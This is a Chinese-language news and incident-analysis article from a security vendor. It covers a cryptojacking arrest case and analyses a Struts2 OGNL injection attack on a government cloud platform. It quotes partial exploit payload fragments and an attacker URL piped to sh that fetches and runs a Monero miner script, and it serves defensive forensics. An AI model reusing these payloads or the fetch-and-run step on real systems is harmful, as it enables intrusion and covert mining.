山东青州批捕9人，因利用木马“挖矿”非法获利约1500万元

近日山东省青州市以涉嫌非法控制计算机信息系统罪依法批准逮捕犯罪嫌疑人贺某丰、陈某旭等九人。该案是青州市首例利用木马程序非法控制他人计算机信息系统进行“挖矿”获取收益的新型犯罪案件。据悉，犯罪人员在2014年12月至2018年4月期间，通过非法控制全国八十多万台计算机进行虚拟货币挖矿，将挖取的虚拟货币进行交易、变现，非法获利约1500万元。

山东米迦勒公司在为某政务云服务平台进行网络安全服务时，发现了挖矿的非法行为，并通过网络全流量安全分析系统还原了黑客挖矿的整个作案过程。本次以某政务云服务平台真实案例对该渗透行为进行剖析，帮助大家了解黑客如何利用Struts2漏洞渗透攻击，进行挖矿行为。

分析过程

在测试链路中，网络全流量安全分析系统通过链路警报数据流特征值，检测到平台存在大量疑似Struts2漏洞攻击行为。

以IP 5.188.10.105（现已被标记web攻击）为例来进行安全分析。经过网络全流量安全分析系统分析发现：5.188.10.105这个IP疑似对测试网络中65个IP发起连接请求，如下图：

会话矩阵图

解码5.188.10.105X.X.90.158两个IP的数据交互过程，发现其已经建立正常连接，并且X.X.90.158返回了 200 OK的响应值。

三次握手视图

数据流解码视图如下：

从数据流解码视图可以看到Content-Type中包含以下字段：

%{(#_='multipart/form-data') 这是触发漏洞的前提条件,也就是Content-Type：multipart/form-data。然后：.(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_

通过ognl表达式静态调用获取ognl.OgnlContext的DEFAULT_MEMBER_ACCESS属性，并将获取的结果覆盖_memberAccess属性，这样就可以绕过SecurityMemberAccess的限制。

内容中还附带下载指令，由于当时发现问题时时间较早，我们将http://5.188.87.12/locales/arrow.jpg|sh（该链接现在已404）下载并重命名为arrow.sh文件，如下图：

发现其为linux 的shell脚本，其大概意思为，首先下载acpid.conf配置文件，随后下载acpid执行文件并后台执行。我们将acpid.conf进行下载，如下图：

通过分析，该行为门罗币的挖矿信息，url为挖矿服务器，user为钱包地址，algo为门罗币挖矿算法。

分析结论

山东米迦勒公司通过网络全流量安全分析系统可以看出，某政务云服务平台65个IP遭受到境外IP 5.188.10.105的利用Struts2已知漏洞进行渗透攻击，该行为可以进行挖矿、窃密、横向移动、提权等操作，对某政务云服务平台造成重大损害。米迦勒安全应急服务中心通过网络全流量安全分析系统对该类型的特征进行回查追踪，找出该IP与内部其它IP地址并进行深度分析，根据特征回查模块查询具有该特征的内部其它IP地址，进行攻击溯源分析、查杀防范等操作。

分析价值

本次分析利用网络全流量安全分析系统针对门罗币挖矿的僵尸网络的入侵行为进行了深度剖析，让我们直观的发现黑客怎么进来的？做了什么？这样不仅可以解决本次问题，还能看清问题的本质，为未来防范提供了切实可行的依据，逐渐将事后补牢的被动防御转变为事前主动防范，真正做到网络安全问题的举一反三，构建保护信息系统的网络安全之墙。

山东米迦勒智能科技有限公司是业界领先的IT安全运营智能管理平台服务商，以“数据驱动运营”为愿景，提供基于网络全流量的网络安全分析追溯取证平台及应急处理服务；致力于利用大数据、人工智能技术进行纵深检测、分析、取证及安全感知，解决不再假设防护能实现万无一失的IT安全运营管理问题。

- END-